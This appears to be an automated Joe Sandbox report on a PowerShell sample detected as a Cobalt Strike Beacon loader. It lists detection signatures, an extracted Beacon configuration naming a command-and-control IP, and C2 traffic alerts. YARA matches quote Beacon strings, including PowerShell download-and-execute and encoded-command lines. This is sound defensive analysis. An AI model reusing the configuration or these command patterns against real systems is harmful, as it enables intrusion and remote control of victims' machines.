Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oEFrY6Xcyl.ps1

Overview

General Information

Sample name:oEFrY6Xcyl.ps1
renamed because original name is a hash value
Original sample name:225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2.ps1
Analysis ID:1542798
MD5:bcb86f9d27c31bae83ab47c9f970ca98
SHA1:2828cf58872227589f46595101d6129ced8334ab
SHA256:225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2
Tags:20-25-126-96CobaltStrikeps1user-JAMESWT_MHT
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected MetasploitPayload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found suspicious powershell code related to unpacking or dynamic code loading
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 2820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "20.25.126.96,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
SourceRuleDescriptionAuthorStrings
oEFrY6Xcyl.ps1JoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
    oEFrY6Xcyl.ps1Msfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
    • 0x72:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
    • 0x586:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
    • 0x673:$s5: = [System.Convert]::FromBase64String(
    • 0x2dc:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
    • 0x4cf:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4602998708.000001A6ED0B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
      00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
        00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
          00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
            00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
              Click to see the 44 entries
              SourceRuleDescriptionAuthorStrings
              0.2.powershell.exe.1a6ed330000.1.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
                0.2.powershell.exe.1a6ed330000.1.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
                  0.2.powershell.exe.1a6ed330000.1.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
                  • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                  • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                  • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
                  • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
                  • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
                  • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
                  • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                  • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
                  • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
                  • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
                  • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
                  • 0x32d6a:$a11: Could not open service control manager on %s: %d
                  • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
                  • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
                  • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
                  • 0x33255:$a15: could not create remote thread in %d: %d
                  • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                  • 0x33203:$a17: could not write to process memory: %d
                  • 0x32d9b:$a18: Could not create service %s on %s: %d
                  • 0x32e24:$a19: Could not delete service %s on %s: %d
                  • 0x32c89:$a20: Could not open process token: %d (%u)
                  0.2.powershell.exe.1a6ed330000.1.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
                  • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
                  0.2.powershell.exe.1a6ed330000.1.raw.unpackWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
                  • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
                  • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
                  Click to see the 40 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi64_2820.amsi.csvJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
                    amsi64_2820.amsi.csvMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
                    • 0xd4:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
                    • 0x5f5:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
                    • 0x6e8:$s5: = [System.Convert]::FromBase64String(
                    • 0x345:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
                    • 0x53d:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

                    System Summary

                    barindex
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", ProcessId: 2820, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", ProcessId: 2820, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-26T13:43:35.032958+020020287653Unknown Traffic192.168.2.64971020.25.126.96443TCP
                    2024-10-26T13:43:37.982753+020020287653Unknown Traffic192.168.2.64971420.25.126.96443TCP
                    2024-10-26T13:43:40.677125+020020287653Unknown Traffic192.168.2.64972820.25.126.96443TCP
                    2024-10-26T13:43:43.356490+020020287653Unknown Traffic192.168.2.64975020.25.126.96443TCP
                    2024-10-26T13:43:46.008163+020020287653Unknown Traffic192.168.2.64976420.25.126.96443TCP
                    2024-10-26T13:43:48.722575+020020287653Unknown Traffic192.168.2.64978320.25.126.96443TCP
                    2024-10-26T13:43:51.454786+020020287653Unknown Traffic192.168.2.64979320.25.126.96443TCP
                    2024-10-26T13:43:54.168915+020020287653Unknown Traffic192.168.2.64980120.25.126.96443TCP
                    2024-10-26T13:43:56.852102+020020287653Unknown Traffic192.168.2.64980820.25.126.96443TCP
                    2024-10-26T13:43:59.563189+020020287653Unknown Traffic192.168.2.64981420.25.126.96443TCP
                    2024-10-26T13:44:02.219634+020020287653Unknown Traffic192.168.2.64982020.25.126.96443TCP
                    2024-10-26T13:44:04.941642+020020287653Unknown Traffic192.168.2.64982620.25.126.96443TCP
                    2024-10-26T13:44:07.688886+020020287653Unknown Traffic192.168.2.64983220.25.126.96443TCP
                    2024-10-26T13:44:10.361019+020020287653Unknown Traffic192.168.2.64984720.25.126.96443TCP
                    2024-10-26T13:44:13.061690+020020287653Unknown Traffic192.168.2.64986220.25.126.96443TCP
                    2024-10-26T13:44:15.778625+020020287653Unknown Traffic192.168.2.64987720.25.126.96443TCP
                    2024-10-26T13:44:18.484894+020020287653Unknown Traffic192.168.2.64989720.25.126.96443TCP
                    2024-10-26T13:44:21.179909+020020287653Unknown Traffic192.168.2.64991520.25.126.96443TCP
                    2024-10-26T13:44:23.895011+020020287653Unknown Traffic192.168.2.64993320.25.126.96443TCP
                    2024-10-26T13:44:26.612940+020020287653Unknown Traffic192.168.2.64995020.25.126.96443TCP
                    2024-10-26T13:44:29.318794+020020287653Unknown Traffic192.168.2.64996520.25.126.96443TCP
                    2024-10-26T13:44:32.042278+020020287653Unknown Traffic192.168.2.64998020.25.126.96443TCP
                    2024-10-26T13:44:34.763942+020020287653Unknown Traffic192.168.2.64999520.25.126.96443TCP
                    2024-10-26T13:44:37.488476+020020287653Unknown Traffic192.168.2.65001020.25.126.96443TCP
                    2024-10-26T13:44:40.165251+020020287653Unknown Traffic192.168.2.65002620.25.126.96443TCP
                    2024-10-26T13:44:42.835987+020020287653Unknown Traffic192.168.2.65004520.25.126.96443TCP
                    2024-10-26T13:44:45.642472+020020287653Unknown Traffic192.168.2.65006220.25.126.96443TCP
                    2024-10-26T13:44:48.416246+020020287653Unknown Traffic192.168.2.65006520.25.126.96443TCP
                    2024-10-26T13:44:51.344997+020020287653Unknown Traffic192.168.2.65006820.25.126.96443TCP
                    2024-10-26T13:44:54.060795+020020287653Unknown Traffic192.168.2.65007120.25.126.96443TCP
                    2024-10-26T13:44:56.709003+020020287653Unknown Traffic192.168.2.65007420.25.126.96443TCP
                    2024-10-26T13:44:59.449017+020020287653Unknown Traffic192.168.2.65007720.25.126.96443TCP
                    2024-10-26T13:45:02.174901+020020287653Unknown Traffic192.168.2.65008020.25.126.96443TCP
                    2024-10-26T13:45:04.888705+020020287653Unknown Traffic192.168.2.65008320.25.126.96443TCP
                    2024-10-26T13:45:07.603556+020020287653Unknown Traffic192.168.2.65008620.25.126.96443TCP
                    2024-10-26T13:45:10.283030+020020287653Unknown Traffic192.168.2.65008920.25.126.96443TCP
                    2024-10-26T13:45:12.989545+020020287653Unknown Traffic192.168.2.65009320.25.126.96443TCP
                    2024-10-26T13:45:15.686450+020020287653Unknown Traffic192.168.2.65009620.25.126.96443TCP
                    2024-10-26T13:45:18.378697+020020287653Unknown Traffic192.168.2.65009920.25.126.96443TCP
                    2024-10-26T13:45:22.589406+020020287653Unknown Traffic192.168.2.65010220.25.126.96443TCP
                    2024-10-26T13:45:25.255307+020020287653Unknown Traffic192.168.2.65010520.25.126.96443TCP
                    2024-10-26T13:45:27.954262+020020287653Unknown Traffic192.168.2.65010820.25.126.96443TCP
                    2024-10-26T13:45:30.654752+020020287653Unknown Traffic192.168.2.65011120.25.126.96443TCP
                    2024-10-26T13:45:33.419957+020020287653Unknown Traffic192.168.2.65011420.25.126.96443TCP
                    2024-10-26T13:45:36.097457+020020287653Unknown Traffic192.168.2.65011720.25.126.96443TCP
                    2024-10-26T13:45:38.808343+020020287653Unknown Traffic192.168.2.65012020.25.126.96443TCP
                    2024-10-26T13:45:41.657149+020020287653Unknown Traffic192.168.2.65012320.25.126.96443TCP
                    2024-10-26T13:45:44.352878+020020287653Unknown Traffic192.168.2.65012620.25.126.96443TCP
                    2024-10-26T13:45:47.115614+020020287653Unknown Traffic192.168.2.65013020.25.126.96443TCP
                    2024-10-26T13:45:49.806539+020020287653Unknown Traffic192.168.2.65013320.25.126.96443TCP
                    2024-10-26T13:45:52.519389+020020287653Unknown Traffic192.168.2.65013620.25.126.96443TCP
                    2024-10-26T13:45:55.290464+020020287653Unknown Traffic192.168.2.65013920.25.126.96443TCP
                    2024-10-26T13:45:57.979184+020020287653Unknown Traffic192.168.2.65014220.25.126.96443TCP
                    2024-10-26T13:46:00.683469+020020287653Unknown Traffic192.168.2.65014520.25.126.96443TCP
                    2024-10-26T13:46:03.393152+020020287653Unknown Traffic192.168.2.65014820.25.126.96443TCP
                    2024-10-26T13:46:06.059822+020020287653Unknown Traffic192.168.2.65015120.25.126.96443TCP
                    2024-10-26T13:46:08.751972+020020287653Unknown Traffic192.168.2.65015420.25.126.96443TCP
                    2024-10-26T13:46:11.481153+020020287653Unknown Traffic192.168.2.65015720.25.126.96443TCP
                    2024-10-26T13:46:14.188731+020020287653Unknown Traffic192.168.2.65016020.25.126.96443TCP
                    2024-10-26T13:46:16.858261+020020287653Unknown Traffic192.168.2.65016320.25.126.96443TCP
                    2024-10-26T13:46:20.646912+020020287653Unknown Traffic192.168.2.65016620.25.126.96443TCP
                    2024-10-26T13:46:24.305152+020020287653Unknown Traffic192.168.2.65016920.25.126.96443TCP
                    2024-10-26T13:46:26.981500+020020287653Unknown Traffic192.168.2.65017220.25.126.96443TCP
                    2024-10-26T13:46:29.690918+020020287653Unknown Traffic192.168.2.65017520.25.126.96443TCP
                    2024-10-26T13:46:32.386337+020020287653Unknown Traffic192.168.2.65017820.25.126.96443TCP
                    2024-10-26T13:46:35.045259+020020287653Unknown Traffic192.168.2.65018120.25.126.96443TCP
                    2024-10-26T13:46:37.861128+020020287653Unknown Traffic192.168.2.65018420.25.126.96443TCP
                    2024-10-26T13:46:40.558417+020020287653Unknown Traffic192.168.2.65018720.25.126.96443TCP
                    2024-10-26T13:46:43.273237+020020287653Unknown Traffic192.168.2.65019020.25.126.96443TCP
                    2024-10-26T13:46:46.014854+020020287653Unknown Traffic192.168.2.65019320.25.126.96443TCP
                    2024-10-26T13:46:48.736786+020020287653Unknown Traffic192.168.2.65019620.25.126.96443TCP
                    2024-10-26T13:46:51.533636+020020287653Unknown Traffic192.168.2.65019920.25.126.96443TCP
                    2024-10-26T13:46:54.273511+020020287653Unknown Traffic192.168.2.65020220.25.126.96443TCP
                    2024-10-26T13:46:57.003778+020020287653Unknown Traffic192.168.2.65020520.25.126.96443TCP
                    2024-10-26T13:46:59.748162+020020287653Unknown Traffic192.168.2.65020820.25.126.96443TCP
                    2024-10-26T13:47:02.448936+020020287653Unknown Traffic192.168.2.65021120.25.126.96443TCP
                    2024-10-26T13:47:05.148131+020020287653Unknown Traffic192.168.2.65021420.25.126.96443TCP
                    2024-10-26T13:47:07.832941+020020287653Unknown Traffic192.168.2.65021820.25.126.96443TCP
                    2024-10-26T13:47:10.544254+020020287653Unknown Traffic192.168.2.65022120.25.126.96443TCP
                    2024-10-26T13:47:13.235791+020020287653Unknown Traffic192.168.2.65022420.25.126.96443TCP
                    2024-10-26T13:47:15.894331+020020287653Unknown Traffic192.168.2.65022720.25.126.96443TCP
                    2024-10-26T13:47:18.756780+020020287653Unknown Traffic192.168.2.65023020.25.126.96443TCP
                    2024-10-26T13:47:21.430912+020020287653Unknown Traffic192.168.2.65023320.25.126.96443TCP
                    2024-10-26T13:47:24.211500+020020287653Unknown Traffic192.168.2.65023620.25.126.96443TCP
                    2024-10-26T13:47:26.900568+020020287653Unknown Traffic192.168.2.65023920.25.126.96443TCP
                    2024-10-26T13:47:29.616847+020020287653Unknown Traffic192.168.2.65024220.25.126.96443TCP
                    2024-10-26T13:47:32.345456+020020287653Unknown Traffic192.168.2.65024520.25.126.96443TCP
                    2024-10-26T13:47:35.043396+020020287653Unknown Traffic192.168.2.65024820.25.126.96443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: oEFrY6Xcyl.ps1Avira: detected
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "20.25.126.96,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
                    Source: oEFrY6Xcyl.ps1ReversingLabs: Detection: 65%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.1% probability
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED331184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_000001A6ED331184
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED349220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_000001A6ED349220
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED341C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_000001A6ED341C30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: 20.25.126.96
                    Source: Joe Sandbox ViewIP Address: 20.25.126.96 20.25.126.96
                    Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49710 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49793 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49714 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49750 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49808 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49832 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49820 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49764 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49814 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49826 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49847 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49783 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49801 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49862 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49877 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49897 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49915 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49933 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49950 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49980 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49965 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49995 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50010 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50026 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50045 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50062 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50068 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50071 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50074 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50077 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50080 -> 20.25.126.96:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50083 -> 20.25.126.96:443
